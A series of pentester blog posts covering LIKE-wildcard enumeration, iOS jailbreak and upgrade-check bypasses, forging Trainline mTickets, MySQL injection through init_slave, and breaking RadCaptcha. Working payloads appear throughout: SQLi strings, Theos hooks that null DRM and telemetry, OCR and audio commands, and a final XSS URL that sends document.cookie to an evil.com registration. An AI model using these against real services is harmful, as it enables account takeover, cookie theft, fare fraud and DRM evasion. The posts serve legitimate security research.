The Dangers of ‘L_KE’

TLDR: This post is about some late 90’s level hacking. But the fact is, that there just doesn’t exist a decent explanation of this vulnerability anywhere on the internet.. and yesterday, in 2018, I found another application vulnerable to it (to quite serious effect). I’m afraid that was the straw that broke the camel’s back. So now we’re doing this… we’re making the blog-post that should have been made 20 years ago. There is a simple zipped-up MySQL/PHP lab at the bottom of this post, feel free to skip to that if you are so inclined.


Lets talk about a SQL feature that’s been around for longer than I’ve been breathing… the ‘LIKE‘ operator. And how, on a good day, it lets an attackers fingerprint an application database and, on a really good day, enumerate content from it.

The issue exists when passing user-supplied data into a SQL ‘LIKE’ operator. e.g:

Select * from `table` where `column` LIKE '{user input}'

For simplicity, lets assume we are using MySQL and PHP here.

Now, you’ve sanitised your user’s input through mysql_real_escape_string(), and you are using prepared statements for all your site’s queries… that’s good. But did you know, that even while doing both those things, the metacharacters for SQL’s LIKE operator ( _ and % ) still get treated specially? Let’s remind you what those do:

Ergo…

Select * from `users` where `username` LIKE 'daniel'

is the same as:

Select * from `users` where `username` LIKE 'd_niel'

is the same as:

Select * from `users` where `username` LIKE 'd_n%_'

is the same as:

Select * from `users` where `username` LIKE '%'.

So, you have identified an application where you are injecting into a LIKE query… now what? What can we do?

Fingerprint the DB

MySQL isn’t the only database to use LIKE metacharacters, MS Access uses a (?) instead of the underscore, and even NoSQL databases have equivalent functions to the LIKE operator. MongoDB’s ‘FIND’ actually uses full PCRE. In any case, the take-home is that search fields are often an interesting place for enumerating a database stack. A script which works through a decision-tree of accepted metacharacters could fingerprint common databases easily, and is left as an exercise to the reader.

A lot of web applications officially expose the use of wildcards in their searches to users, for example with ‘?’ or ‘*’ characters. These characters are often directly substituted for the DB’s native ones behind the scenes, so you can often still fingerprint the DB from the search’s behaviour, even with these odd characters.

See potentially interesting result-sets

  • You may be able to see all results in one hit (using ‘%’ or an empty string). Silly as it is, even in 2018 this is usually more taxing on databases/applications than the developers had margined for, and might cause a Denial of Service.. so be careful.
  • You may be able to find the shortest and longest (in string length) content by incrementing ‘_’ characters until the first and last result-sets are found.

Often, in queries where you are searching through a lot of data, you might find that unusually large or unusually small results (in string length), or ones which contain non-standard characters or formatting, will be test entries you probably weren’t really supposed to see. E-commerce sites often have test/dummy products that will stand out like this.

Understand the query structure and DB schema better 

Suppose you are black-box testing an e-commerce application where you can type in a product. You don’t know if you are supposed to type in the product’s code (‘#9051202716-23’), its name (‘Sony PlayStation 4’), the product’s genre (‘games console’), or part of the product’s description (‘successor to the PlayStation 3’) to get results. It might be, that your LIKE query actually searches through all of these things. Rather than making assumptions about what our input should look like, we can trivially enumerate this (via brute-force), and better understand the application’s database schema.

Get all possible queried data

On an application which reflects all queried column data, dumping all that information might be as simply as typing an empty string or percent-sign. And if not all queried column data gets reflected back then we can likely still brute-force these values and get them that way.

It might be that the application searched 10 different columns but will only display the number of results found. Even in this extreme case, with some efficient automation we can brute-force all of the queried column’s data.  In the context of an e-commerce site searching products, this may not a problem, but an application should never let you search against something that it is not prepared to show you or you don’t have access to see; i’ve seen far worse cases.

I’ve made a lab to demonstrate exploitation in a semi-realistic scenario, called ‘BlackHat Books’. Feel free to download it and let me know if you get the flag.

blackhatbooks.zip

 

Much Badoo About Nothing

This is just a short post about toying with the Badoo app for iOS, but also touches on something ever-so-slightly useful about testing the app-upgrade mechanisms of mobile apps. “Urghh more dating app hacking” I hear you say. I know i know, this is getting old. At some point i’ll get a real hobby, I promise.
As of version 5 of Badoo, which has been out for a while now, two things happened. Firstly, they added a forceful crash upon jailbreak detection that I couldn’t be bothered to circumvent… because, secondly, they remade the UI from scratch and I don’t like unnecessary changes in my life. Na Uh.
Jailbreak detection routines for older Badoo versions have been a bit laughable. You have had:
– (bool) jailbroken in class GADDevice,
+(bool) deviceIsJailbroken in class FlurryUtil and finally…
+(bool) appIsCracked also in class FlurryUtil.
These are such common methods/classes that xCon will automatically patch them out and you might never have even known they existed. But they did.
So, I already HAD a solid app which I liked and worked… why can’t I just keep using it? Using App-Admin from Cydia or AppCake, lets downgrade to the latest release of the 4.x branch. App-Admin thinks this is 4.57.4 and AppCake thinks this is 4.9.
4.9 seems suspiciously high. I’m always weary of AppCake, I wouldn’t be surprised if this is a maliciously-modified binary… but oh well, lets install it anyway! (Mr Optimistic).
Well we are back to the glory-days of the orange Badoo icon, but this happens when you open < v5.0 of the app today:

Apparently it’s time to update

Oh no! A version check and a view which tells us to go away and upgrade. Daniel is sad 😪
Ok well… I very much doubt the devs at Badoo are doing per-app-version API keys and burning those keys used for older, now unsupported, app versions. And I doubt the app’s API calls or endpoints have changed since the V4 days either. Sooooooo… we just need to force the V4 app to work again, right?

*cracks knuckles*.

OK guys. This is going to be some very technical, next-level shit that this is about to go down in Cycript. I’m not sure your eyes can withstand the eliteness of what they are about to see…

root# cycript -p $(ps -A | grep "Application" | grep "Badoo" | cut -d' ' -f2)
cy# [UIApp.keyWindow setHidden:YES]

*wipes sweat away from face with forearm and presses enter*

“Sign in with Facebook”

The upgrade view has been hidden and we’re at the default “Sign in with Facebook” login – Looks good so far.

Let’s see if it works…

Victory! ( Ginger Morticia aside).

Yup. That’s really it. Underneath the top-level “please upgrade” view (think webpage z-indexes) the app is just chilling there, perfectly functional.

I suppose for a dating app the ramifications here are pretty “meh”, but I have seen the same “throw an upgrade page over it” technique used to prevent use of an outdated (and vulnerable) MDM application on iOS… which is totally uncool. When you are testing iOS apps, try and download a few older versions, time permitting, and see exactly what prevents them from functioning. If you can get these working you might have an easier time trying to introspect these, VS more modern versions with all the security bells and whistles (such as cert pinning, jailbreak detection).

-Hiburn8

"App Forgery" – A Modern Take on The World's Second-Oldest Profession

In this (pretty long) post, I’m going to attempt to coin a name for an application vulnerability, most commonly found in mobile apps. This is “App Forgery”.
I’ve decided it’d be better to explain the details of this vulnerability using a report-style write-up for an example, real, vulnerable app.
I’ve picked on the first app which came to mind vulnerable to app forgery, which is the “Trainline” app for iOS. The app allows travellers in the UK to purchase digital train tickets and, in this instance, app forgery allows Mr Bad Guy the ability to travel for free indefinitely.
Trainline app usage (skip ahead if you’ve used the app a few times):
For the unfamiliar, basic usage of the app is this: You link your bank card, tell the app where you want to go, type in the 3-digit CVC from the card and you can now download a mobile ticket (which they insist on calling an “mTicket”). An mTicket shows all of the travel information you would find on a normal ticket and is even designed to look a little like a traditional physical one. You tap “activate” on that ticket the day you want to use it and it goes from greyed-out and static to coloured-in and animated, showing that its active.
The guts of an mTicket is displayed across two views in the app, which are toggled via a “UISegmentedControl” (a button).

QR Code (left) / Traditional ticket representation (right)

View one shows a QR code which contains all of the train ticket information. Scanning this QR code with a device provides the only realistic means to easily validate information contained on the mTicket, since inspectors don’t have the time or means to validate tickets manually from the visual portion of the ticket. After scanning the code, the handheld devices I have seen appear to light up either green for “valid” or presumably red for “invalid”.
View two contains a visual representation of a traditional ticket, with journey and ticket details. The current time scrolls from left to right in <marquee> fashion, against a background made from three different colours. These colours differ for each journey and there is no discernible way to determine a journey’s colours prior to activating a ticket. In theory, inspectors on any train should be aware of the “correct colours” for that journey and spot a fake ticket. The fact the current time shown on the ticket scrolls also thwarts people attempting to share tickets via screenshots/video.
Basic introduction to the app out of the way, here’s the write-up for App Forgery.


MEDIUM – “App Forgery” Possible

Summary
It is possible for an unlawful person to create a forged/counterfeit Trainline application and mTickets, allowing the forger to travel on trains for free.
Finding
It was found that mTickets created within the application are almost always incorrectly validated¹; with validation occurring based on the physical appearance of mTickets, rather than a proven tie between data on a passenger’s mTicket and server-side data.
Typical mTicket validation pre-boarding a train normally involves scanning the mTicket’s QR code at a barrier to allow passing through it. If, for any reason, the mTicket fails to validate, validation will fall back to the ticket being inspected manually by nearby staff.  Alternatively, some stations without these barriers only perform manual inspection, and many smaller stations perform no ticket checks at all prior to boarding. Then, at some point during the journey, additional ticket checks are often performed by an on-board ticket inspector, using a handheld device for scanning the QR code on mTickets. This device is often unavailable to inspectors, also resulting in mTicket validation being performed manually.
Manual mTicket inspection consists of the inspector assessing, by eye, the physical appearance of the second (non QR code) view of the mTicket. This portion of the mTicket contains no piece of information from which the inspector can use to appropriately validate it, given their time and resources². This permits anyone with moderate iOS development skill the chance to create forgeries of the Trainline app/mTickets.
Exploitation
As a proof of concept, the Trainline’s mTicket section was forged from scratch. The process took around 5 hours, which mainly consisted of determining some of the assets in use in the real Trainline app, such as fonts, and the exact positioning of UI elements.

Trainline app forged in Xcode

Legitimate Trainline app VS forgery

The QR code and background colours of the current time area will ofcourse be invalid on any forgery, although these are so infrequently checked that it really does not matter. When the QR code fails to validate at barriers or, on rare occasion, on a train… the likely outcome is that inspectors will briefly assess the right segment of the mTicket and allow the passenger to continue travelling.
For this particular app forgery, it was designed such that each of the journey detailson the mTicket behave like a text-field and are modifiable by clicking on them. This allows a forger  to easily recreate the appearance of any journey details they wish and travel on that journey for free.
Some of the considerations/context which resulted in this issue being attributed with a “Medium” severity risk rating were:

  • The attack does not rely on any server-side processing, and is therefore difficult to detect.
  • In theory, a person could purchase a legitimate ticket, note the ticket’s QR code and colours, refund the ticket and implant these into a forged app. Recreating a more legitimate-appearing ticket.
  • The level of social engineering involved is minimal, inspectors whom are able to spot errors in a forged app are unlikely to assume anything untoward and, at worst, would likely except the ticket as the result of an error within the legitimate app.
  • The barrier to creating a forged app is relatively high, although one could be easily shared/distributed afterwards.

Remediation

  1. mTickets should be validated only by way of QR code. There is no appropriate alternative within Trainline mTickets currently. This will likely involve greatly increasing the numbers of available QR code scanners to station and train ticket inspectors.
  2. Consider a revision/upgrade to the handheld QR code scanners. These devices  do not appear to offer the inspector enough verbosity to allow them to determine if a scanned QR code is either fake, has been previously scanned, expired, or erroneous. These devices, if network connected, should be able to provide this information to help catch and deter forgeries.

Citations
1. This has been determined from the personal experience of the tester, having used the application for a number of years. This does not account for other user’s experiences.
2. A small mitigation technology to app dummying does exist by way of the coloured background where the current time is displayed. These colours change depending on journey details and should provide a means for inspectors to determine suspicious tickets. However, from experience discussing this feature with inspectors, staff are usually unaware of the correct colours for their journey.


Hopefully this explains things well enough to help you spot and report on app forgery vulnerabilities in the future.
-Hiburn8
 
 

The Happn'ing

Years ago, one of the first posts I ever wrote was about my experience scripting a bot for the dating site OKCupid. It was just a PoC bashed together over a few beers with a friend.
Since then (and becoming single) I’ve scripted bits and bobs for virtually every major dating site/app… its become a bit of a weird hobby.
A while ago I wrote a reasonably feature-filled script for managing a user account on the dating app Happn, imaginatively called Happn.py”. It was immediately spotted by a few Happn employees on my github, who starred the project, but then prevented it from actually working by blocking the python user-agent on the Happn servers. I made the repo private and updated it to work again, with the intention of spending some more time developing it. That time never really came and I stopped using Happn a while ago, so I made the tool public and this is just a quick post to share it.
It comes with command-line options to manage just about everything you can do within the app, as well as a few naughty/fun things to play with… such as the “warandpeace” exploit, which crashes the Happn app of a victim/target account. If you’re struggling to manage your 5k Happn bot swarm I can’t imagine writing a wrapper for this would be particularly hard 😉
https://github.com/hiburn8/happn.py

Ready the Anti-BEAM Beam! Breaking the Virgin BEAM app in 12 minutes

I’ve been travelling on Virgin trains a lot recently and finally decided to take a look at their free movie-streaming app “BEAM”.
Super-excited to  be about to watch Forest Gump on my journey, I found that whenever I hit play, the app’s custom video-player decided to freeze and eventually crash the app on my device of choice; an iPhone 6s.
Determined to watch Hanks’ award-winning performance, I looked at the devices’s system-log for clues. This revealed that, while the BEAM app’s process was in its final moments in this world, the words “Jailbreak Detected” were logged.
Interdasting.
Throwing the app into Hopper and searching for “Jailbreak Detected” shows the following line:

This indicates that the method handleNotification of class CapmediaDrmVideoViewController1 is likely responsible for creating the sys-log entry.  “DRM”? yeah, that sounds about right. On the off-chance this method is also responsible for the jailbreak-detection routine, lets just swizzle that method and null it using a Theos tweak:

%hook CapmediaDrmVideoViewController1
- (void)handleNotification:(id)no{
}
%end

compiling. compiling… compiling…
open BEAM -> click Forest Gump -> click play ->

Yep, that works. Bypass done 🤠 stop the clock.
Looking at the network traffic for the app afterwards, I noticed that a virgin-owned domain was being POST’d to with a “errorid” parameter, every time I opened a video. This didn’t stop the app from working but was clearly updating Virgin about my jailbreak. This told me that, actually, handleNotification didn’t do the detection routine itself… but was probably responsible for causing the purposeful crash afterwards. So while the app knew it was jailbroken and was able to dial-home and tell mom… it wasn’t able to force-quit. We hadn’t zapped the problem at its root, just kinda circumvented it.
In theory, some 31337 virgin… employee (I couldn’t help myself) would be able to put two and two together, noticing that my phone had purportedly crashed, but was still able to successfully stream the entirety of Tom Hanks’ back-catalogue, and infer a bypass had been made; potentially leading to a revised security mechanism in a future update. We can’t have that!
A cheeky class-dump reveals that the CapmediaDrmVideoController1 class also has a sendPostRequestForPlaybackError method. Honestly people, it doesn’t get any easier than this. Lets null this guy too:

%hook CapmediaDrmVideoViewController1
- (void)sendPostRequestForPlaybackError:(id)err{
}
- (void)handleNotification:(id)no{
}
%end

compiling. compiling… compiling…
So now the app is both bypassed and flying under the radar 🙌
This really isn’t good enough Virgin.
Lessons for your developers:

  • Don’t log things that don’t need logging. (“Jailbreak Detected” 🤦)
  • Ideally, don’t detect a jailbreak with one routine and do something about it in another.
  • Do your JB detection at the start of application launch! The biggest deterrent for me trying to bypass an app’s JB-detection, is repeatedly watching the app crash before the app’s launch-screen has even ended. I’ll give up if it happens enough.
  • Don’t just force-crash/exit() when you detect a jailbreak… start crippling the app from the inside. Delete critical app files so it wont work again, set flags which force the app into a code-path that prevents it from working and store it somewhere that’ll persist even if the app is deleted and re-downloaded (ala keychain). Be sneaky. Very sneaky.

 

PentestCTF – Another CTF Framework

Instead of doing my final-year project at University, I made (another) open-source CTF/Lab framework, primarily for my own learning benefit during its development, but also because I realised how powerful a group learning environment like a CTF is and I wanted to deploy one at my University.
Its pretty much the same as all the others I’ve seen, although it has a few extra features. Namely:

  • The ability to detect when its own labs are down and show that on the labs page.
  • It has its own accompanying iOS app. Flags from iOS labs can automatically open the main PentestCTF app and submit them.
  • An API. Make your own CLI tool or interface for it, see if I care.
  • A good/simple schema. A lot of CTFs have messy schemas and small improvements to the app are a bit of a headfu** to implement.
  • Achievements. Theres only a few added by default, but they are there and you can make rules to add new ones.
  • Admins don’t need to give you a default password or let you type a password into their “super-user” session. They just send you a link with a token to create your account yourself, and you request another link with a token to make any changes to your account.
  • Game modes. So, the idea is that you instigate a “game mode” to get people in the hacking mood if things slow down. You can create bonus points for things like “most improved over a month” or “most scoreboard overtakes”.

A demo of the site should be live on PentestCTF.com if you want to take a look. Contact me if you want the source. FYI: On the demo site, the labs were thrown on there from various sources; @Strawp, a BAE CTF in 2015 and my friend Guga who has no online presence… props to those guys.

JTAGulator 3D Printed Case

Super-quick post.
I 3D printed a case for my friend’s JTAGulator and it came out pretty well so I thought i’d share. JTAGulator provide 2D drawing/design files to easily cut out an acrylic case for the board (JTAGulator: Acrylic Case Assembly), so I just stencilled over that in CAD software, extruded the two (top/bottom) pieces an eighth of an inch and traced the JTAGulator logo onto the top face.
The files are scaled to inches rather than mm so if, like me, you use a slicer like Cura that talks in mm, you will need to scale the model in Cura/whatever by 25.4.
The writing isn’t very tall so make sure you’re quick to pause the print and swap filament if you want to text to be a different colour.
OBJ & SketchUp files: jtagulator_case_3dprint
Top
screen-shot-2016-12-07-at-15-58-30 screen-shot-2016-12-07-at-15-59-40
Bottom
screen-shot-2016-12-07-at-16-02-44

SQL Injection using System Variables in MySQL

For BSides Manchester 2015 the UK pen-testing company aptly named ‘Pentest’ held a SQL injection challenge where the injection point required structuring the payload in a specific manner with MySQL voodoo to keep the payload under 90 characters, and bypass a basic WAF.
I was fairly certain the lab could also be accomplished using MySQL variables, but was unable to get the job done. Low and behold, it totally was possible and it turned out I overcomplicated the solution which they revealed could be achieved with the following:

http://bsides-2015.pentest-challenge.co.uk/?search='or@:=(select table_name
    from information_schema.tables limit 40,1)union select 1,2,@%23

This was something I’d never looked at before, and it just didn’t cross my mind to store the query result and retrieve it using a variable with one hit using a UNION. I was trying to do this over two queries and therefore my variable would always be empty/null when i tried to retrieve it, as MySQL variables are scoped to a SESSION ( a single database connection ), and are emptied after the first query completes and the application closes its connection.
This lead me to going completely down the wrong rabbit hole trying to solve the challenge, but also into discovering something reasonably interesting: SQLi with System Variables.
Ok so this is effectively a new technique of SQLi, specific to MySQL (i think). However, its also most often useless; since it requires one of two rather outlandish conditions to be met for an application to be exploitable via this method, both of which would usually mean that the application can be exploited much more trivially. These conditions are:

  • You need to be able to inject at the very begging of the query

OR (as was pointed out to me by SQLMap’s Miroslav Stampar)

  • The MySQL database needs to be configured to allow stacked queries

In the event you can do this though, this method should provide a few benefits over a more tradition SQLi technique:

  1. The ability to inject into small input-length areas
  2. The ability to execute arbitrarily long queries into these areas
  3. The ability to bypass a decent amount of WAFs or poor SQLi defence mechanisms (blacklists)
  4. The ability to add a level of stealth to an otherwise fairly obvious attack
  5. The ability to make forensic analysis of the attack potentially more complicated

Ok so if you read the MySQL SYSTEM reference documentation here, you’ll see that there are a lot of these SYSTEM variables which alter the configuration of the database. 40 of these variables hold string values and are either a GLOBAL (permanent) variable or can be set to either a GLOBAL or SESSION variable.
The online reference doesn’t say what the constraints are on each of these 40 SYSTEM/GLOBAL string variables; and I soon found some only accept specifically formatted string data, and that others are capped to short lengths… so I made a short application which just tried to set each one to a longer and longer length arbitrary string to find out which of these variables could be of use in storing arbitrary, and arbitrarily long, string data.
It turns out there is just one SYSTEM/GLOBAL variable out of the lot which is fit for this purpose and wont break MySQL if you fill it with crap => init_slave
My idea was not to store the result of a query within the init_slave variable and then select it, like in the BSides challenge, but to actually store a query there, prepare and execute it.

SET GLOBAL init_slave='select table_name from information_schema.tables limit 40,1';
PREPARE stmt1 FROM @@init_slave;
EXECUTE stmt1;
DEALLOCATE PREPARE stmt1;

If you can inject the above queries into an application, you ultimately run the contents of init_slave.

select table_name from information_schema.tables limit 40,1

Because of neither prerequisites were met for these types of queries to work in the challenge, I gave up on this line of thinking. Although, for fun, I revisited it afterwards to see what would have been possible if those prerequisites were met.
In the event user input is restricted via a basic WAF or similar, like in the challenge, the identified SQL words might render the injection point realistically exploitable. We can potentially get around this scenario with some creative concatenation:

SET GLOBAL init_slave="selec"
SET GLOBAL init_slave=concat(@@init_slave,"t fro")
SET GLOBAL init_slave=concat(@@init_slave,"m inforamtion_schem")
SET GLOBAL init_slave=concat(@@init_slave,"a.table")
SET GLOBAL init_slave=concat(@@init_slave,"s limi")
SET GLOBAL init_slave=concat(@@init_slave,"t 40,1")
PREPARE stmt1 FROM @@init_slave;
EXECUTE stmt1;
DEALLOCATE PREPARE stmt1;

All we need to get past the filter is “SET”, “GLOBAL”, “CONCAT”, “PREPARE” and “EXECUTE”. Thats a fairly reasonable ask.
In the event our input is also length restricted, again like the challenge, we can take this method to the extreme and concat a single character at a time.

SET GLOBAL init_slave="selec"
SET GLOBAL init_slave=concat(@@init_slave,"t")
SET GLOBAL init_slave=concat(@@init_slave," ")
SET GLOBAL init_slave=concat(@@init_slave,"*")
SET GLOBAL init_slave=concat(@@init_slave," ")
SET GLOBAL init_slave=concat(@@init_slave,"f")
etc...

The longest required query for this method when adding one character at a time is 46 characters; almost half of the BSides challenge. Although in reality your payload will need a bit of manipulating to fit the particular injection point.
The only issue with this technique is that it would require a lot more requests to be made to the application; which may or may not be an issue.
However, this could be  seen as a positive, since being able to trickle one, relatively dumb looking, payload per week to a vulnerable application could help the attack go unnoticed.
Ultimately, this is a rather obscure method of SQLi, but it might be the only available method in some extreme edge-cases. So it might be worth adding it to the memory banks for a rainy day.
A ‘FIX’?
At first I wasn’t convinced this was a bug which needed fixing, and that it might just be abuse of normal operations. The more I think about it though, the more ridiculous it seems to me that SYSTEM variables can be used in a prepared statement in the first place. I’ve found no legitimate use-case for this whatsoever.
Since the init_slave value cannot be copied into a SESSION variable and then executed over two queries (the variable would empty), we only have to worry about not letting init_slave (or any other ‘vulnerable’ SYSTEM variables) from being used as part of a prepared statement. So a fix could easily be created by prohibiting that from happening.
Edit: I’ve submitted a MySQL bug report, with the above as the recommended behaviour: http://bugs.mysql.com/bug.php?id=81986.  Lets see if it gets laughed at.
Edit2: As expected, the powers that be at MySQL/Oracle refused to acknowledge this as bug in MySQL, let alone one with security implications (because executing system configuration strings as a query is a solid feature, right?). Full transcript of communication is here: 81986. I pretty much did a mic-drop at the end, there could be more correspondence from Oracle but I won’t be bothering to look. Its probably the only time I’ll ever submit anything directly to them, the process was slow, painful and the engineer assigned to my case was the human embodiment of why we have vulnerable software.
-hiburn8
 
 
 

Gotta Captcha'm All – Automating Image (and Audio!) Captchas.

A captcha serves one purpose. To ensure that a human has performed a task, and not a machine.
In web applications, they attempt to prevent attackers from creating automated bits of code to brute-force forms, fuzz user input or cause a denial of service.
Its very much a non-trivial task these days to differentiate the man from the machine using these image ( and sometimes audio ) “challenges”, as the logical steps a human brain takes to decipher characters from a captcha can almost always be replicated, often more effectively, in code. The types of people you deploy a captcha to shield yourself against are unlikely to be thwarted by something that can be programatically broken. You’re often just adding another hurdle with a captcha. Some people like hurdles.
With this in mind, if you have chosen to use a captcha to protect a mission-critical application from attack… I am of the opinion you’re already a little bit screwed. A captcha is suitable for stopping a casual WordPress blog like this from being overrun by spam comments from knock-off Barbour jacket merchants, nothing more.
On a recent test, a mission critical application for a bank was indeed vulnerable to a nasty DoS, caused by using the ‘RadCaptcha‘ captcha system, which is built into the commercial ‘Telerik’ .net framework. Its a particularly crappy captcha. A previous pentest from another company had already highlighted this, but without demonstrating how it could be broken the bank were reluctant to swap it out.
For the rest of this post, I’ll detail some of the steps I took, and tools I used, to create a PoC for bypassing Telerik RadCaptcha. At the end of it you should have a reasonable idea of how to incorporate captcha-beating functionality into your own scripts. The secondary take-home should be to not use RadCaptcha.
A RadCaptcha protected form typically incorporates both an image captcha, and alternative audio captcha for the visually impaired.
The image captcha looks like this:
Imgcaptcha.jpg

Imgcaptcha.jpg

…and the audio captcha sounds like this:

RadCaptcha_Audio_4ec6deb0.wav

Right, lets break these bad boys. Starting with that image captcha.
Here are some of the problems with it:

  • The characters are evenly spaced (the image can be perfectly divided into five segments of 55pixels in width, each containing one character). In an ideal world the characters would be at uneven spacing to make the process of determining where characters start and end more complex for a program. Most OCR tools designed to break captchas wont have a problem figuring this out, but if they did, we could programatically chop the image into five segments and perform OCR on each character separately.
  • The image only seems to have two colours; white and a shade of grey. If character edges are coloured similarly to their backgrounds, it can be tricky for OCR tools to distinguish character edges.
  • The “dust” effect is terrible. Tiny speckles, none of which obstruct the characters in any way.
  • No other effects. No lines scrawling all over the text, nothing.
  • Character warping. There basically is none. It just looks like a quirky font :/

Step 1 – While the image is basically made of two colours anyway, lets convert it to a greyscale .pnm file. Most OCR tools like working with .pnm files but dont include the ability to do the conversion themselves:

djpeg -pnm -grey Imgcaptcha.jpg > Imgcaptcha.pnm

Step 2 – Install gocr ( one of many free ORC tools for *nix ) and read the manual:

apt-get/brew install gocr && man gocr

Step 3 – Win:

gocr -d 50 -C a-zA-Z0-9 -a 85 -m 16 -i Imgcaptcha.pnm

The -d 50 tells gocr to attempt to remove clusters of pixels less than 50pixels in size (the “dust”). This completely removes the effect.
-C a-zA-Z0-9 defines the character set to use, which should aid accuracy.
-a 85 specifies the certainty level we want for a character. If our output from this command contains less than 5 characters, we know that there was a < 85% chance that one or more characters were right. So we can skip that captcha and grab another one. Although you can ramp it up to about 95 with RadCaptcha and never miss a character (doh).
-m 16 tells gocr to work in a mode whereby  it wont attempt to separate overlapping characters. Since there wont ever be any in RadCaptcha, this could improve things.
Done. We can turn this process into a one-liner and integrate it into any tool we want to attack a RadCaptcha form. Absurdly easy. Daniel 1 – Telerik 0.
Now for that audio captcha.
We didn’t really have to design a system to break the image captcha, we just used off the shelf tools, actually designed for the job. Here though, we need to construct a process for defeating the audio captcha ourselves (since the closest off the shelf tools for this are for clear audio recognition, and they don’t much like captchas).
Lets pick apart its bad bits and have a think. Listen to it one more time 😛

RadCaptcha_Audio_4ec6deb0.wav
  • The voice uses the NATO phonetic alphabet. This makes the length of each letter last longer, and creates a signature that may be easier to detect.
  • By getting my hands on a copy of the Telerik framework, I could see that the way this system works is it has one audio recording for each character A-Z, 0-9. The framework stitches combinations of these .WAV files together, adds some noise and then dumps the result as a captcha. The fact each character has only one recording is obviously poor. Its the equivalent of having no character warping in an image captcha.

Here’s the process I ended up going with:
Firstly: Create some baseline files:

  1. Obtain enough of the audio captchas files, so that we have all letters A-Z and all digits 0-9 somewhere in at least one of them.
  2. Remove the “noise” effect from these captcha files.
  3. Cut out each character from the captcha files programmatically by detecting the small silences in-between characters, and save them into their own file. e.g. 9.wav, alfa.wav, bravo.wav etc.

Note: If you have access to a Telerik installation, you could  just rip the raw character sound files out of the framework and use those. Although I tried this and actually found it made the process less accurate. (Its also less hacker-like and you lose cool points.)
Then: To perform the character recognition from a captcha:

  1. Take an audio captcha with unknown characters.
  2. Strip the noise.
  3. Split the .WAV on the silence in the same way as before to separate the unknown characters into individual files.
  4. Use an audio fingerprinting tool to match the similarity of our unknown character files against each of the baseline files (alfa.wav etc).
  5. On a reasonably high match, store the matching character and process the next one, etc etc.
  6. Script this whole process. WIN.

Ok so lets create those baseline files for starters:
Firstly, save  copies of captchas containing A – Z and 0 – 9. This should be as simple as refreshing the protected page a number of times and saving the .WAVs.
We’ll use the *nix tool sox for most of the audio processing. Its apparently “the swiss-army-knife of sound processing programs”. That sounds good, I’m sold.

apt-get install sox

To remove the noise from a captcha we first need to create a “noise profile” for it in sox. We can later use this profile to tell sox how to effectively negate the noise and output a “clean” version of the captcha.

sox RadCaptcha_Audio_4ec6deb0.wav -n noiseprof noise.prof
sox RadCaptcha_Audio_4ec6deb0.wav CLEANED_RadCaptcha_Audio_4ec6deb0.wav noisered noise.prof 0.21
CLEANED_RadCaptcha_Audio_4ec6deb0.wav

Now we need to split the captcha at each moment of silence in-between characters, so we can get just the characters we need out of it.

sox -V3 CLEANED_RadCaptcha_Audio_4ec6deb0 CHARACTER.wav silence 1 3.0 0.1% 1 0.3 0.1% : newfile : restart

Rename the files to something more sensible (in this case foxtrot.wav), and you should have a bunch of files like this:

Foxtrot.wav

Repeat this enough times and Bingo! we have all the characters of the alphabet (in NATO phonetic form) and all digits; de-noised, and contained in their own files.
Ok so now we want to be able to use these files to detect the characters in a new captcha programmatically. Lets grab a new captcha (RadCaptcha_Audio_1bc2eaa5.wav) and perform pretty much the same process on that file as we did to generate our base files; strip the noise and separate at the silence. This will give us the unknown characters from a captcha in separate files.

sox RadCaptcha_Audio_1bc2eaa5.wav -n noiseprof noise.prof
sox RadCaptcha_Audio_1bc2eaa5.wav CLEANED_RadCaptcha_Audio_1bc2eaa5.wav noisered noise.prof 0.21
sox -V3 CLEANED_RadCaptcha_Audio_1bc2eaa5 UNKNOWN_CHARACTERS.wav silence 1 3.0 0.1% 1 0.3 0.1% : newfile : restart

To compare these unknown character audio files with our baseline ones and determine which characters make up the captcha, I found a pretty good audio fingerprinting perl script audio_chromaprint_diff.zip (npointsolutions.blogspot.co.uk/2015/03/comparing-audio-files-with-sense.html).
Either download the above .zip and extract the audio_chromaprint_diff.pl script, or grab it from the above URL.
Quickly install its dependancies:

apt-get/brew install libchromaprint*
CPAN install 'Statistics::LineFit, Data::Dumper, Capture::Tiny'

Audio similarity tools, I have learned, don’t like comparing 1 second audio files like my foxtrot.wav and a potential character from an audio captcha. Amazingly, we can defeat this problem by just stretching the audio files. So we do this to all our [A-Z0-9] .WAV files and make them at-least 5 seconds a piece (the longer the better).

sox foxtrot.wav foxtrot_slow.wav speed 0.3
foxtrot_slow.wav

The base files wont sound like numbers or the NATA Phonetic Letters anymore, but as long as we do the same thing to the unknown characters from a captcha, that doesnt matter.

sox UNKNOWN_CHARACTERS1of5.wav UNKNOWN_CHARACTERS1of5_slow.wav speed 0.3
UNKNOWN_CHARACTERS1of5_slow.wav

They sound quite similar right? Good. They should, the unknown character is also foxtrot, or “F“.
Time to test the perl script:

root@hiburn8:# perl fingerprint.pl foxtrot_slow.WAV UNKNOWN_CHARACTERS1of5_slow_slow.wav | tail -1 |
Goodnees of fit R2 for File1 & File2 = 0.99214093

The files match with over 99% certainty. Seems like a success to me!
All we do now is create a loop to check each unknown character against our base files, and move on to the next character when we get a match somewhere around the 80% mark. Its not terrifically efficient, but it works.
Daniel 2 – Telerik 0
Its worth stringing processes like this together on a test if they don’t take you more than a few hours. If a developer has made a conscience decision to include a captcha somewhere, he/she has obviously put it there to add security. If you can prove that it doesn’t really work… that’s a finding, regardless of whether you then find other vulnerabilities with the form.
– hiburn8

"Bypassing" CSP's Data-Exfiltration Protections

A long time ago now, I tweeted a challenge to see of anyone knew what the following URL would attempt to do:

http://www.insta-mapper.com/google_map.php?device_id=1234';$.ajax({url:'/wp-login.php?action=register',type:'POST',data:"user_login='dr'&user_email='dr@evil.com'&gclient_id=&gredirect_uri=http://www.insta-mapper.com/&state_uri=http://www.insta-mapper.com&client_id=721352147882378&redirect_uri=http://www.insta-mapper.com&ws_plugin__s2member_registration=e4e7762e6a&ws_plugin__s2member_custom_reg_field_user_pass1='123456'&ws_plugin__s2member_custom_reg_field_user_pass2='123456'&ws_plugin__s2member_custom_reg_field_first_name='d'&ws_plugin__s2member_custom_reg_field_last_name='r'&ws_plugin__s2member_custom_reg_field_address_1='1'&ws_plugin__s2member_custom_reg_field_address_2=&ws_plugin__s2member_custom_reg_field_city=s&ws_plugin__s2member_custom_reg_field_country=u&ws_plugin__s2member_custom_reg_field_mobile_devices='" encodeURI(document.cookie) "'&ws_plugin__s2member_custom_reg_field_mobile_devices2=Apple&redirect_to=&wp-submit=Register"});var lol='a

Don’t worry, I don’t expect you to stare at that monstrosity. Instead I’ll just tell you;
